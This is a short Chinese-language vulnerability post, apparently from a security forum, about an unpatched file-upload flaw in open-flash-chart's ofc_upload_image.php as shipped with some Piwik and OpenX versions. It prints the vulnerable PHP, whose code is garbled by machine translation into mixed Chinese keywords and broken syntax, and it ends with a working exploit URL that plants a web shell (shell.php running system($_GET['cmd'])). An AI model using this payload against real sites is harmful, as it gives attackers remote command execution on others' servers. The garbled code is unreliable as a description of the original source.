测试通过的版本,本地测试成功:

Piwik 0.4.3
Piwik 0.4.2
Piwik 0.4.1
Piwik 0.4
Piwik 0.2.37
Piwik 0.2.36
Piwik 0.2.35
OpenX 2.8.2
OpenX 2.8.6
OpenX 2.8.5
OpenX 2.8.4
OpenX 2.8.3

目前官方还没给出补丁

分析代码:

<?PHP
    /*这个临时文件,我们将上传的图像文件保存默认路径*/
    $ default_path ='.. / tmp目录,上传,图像/';

    /*检查是否存在$ default_path变量*/
    如果(!file_exists($ default_path))

    /*如果属实,使具有写入权限的目录*/
    mkdir($ default_path,0777,真实);

    /*然后,创建在与上面的文件名称的目录从形式输入“名称”*文件/
    /*这个变量的状态并没有删除后再使用*/

    $destination = $default_path . basename( $_GET[ 'name' ] ); 

    保存您的图象: '. $destination;

    /*恶意代码在这里,并且攻击者能执行这个代码*/
     $jfh = fopen ($destination, ‘w’)或(“不能打开文件”);
    fwrite($ jfh,$ HTTP_RAW_POST_DATA变量);
    fclose($ jfh);
?>

Exp 利用程序:

http://www.***.com/lazivip/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&amp;HTTP_RAW_POST_DATA=&lt;?system($_GET['cmd']);?&gt;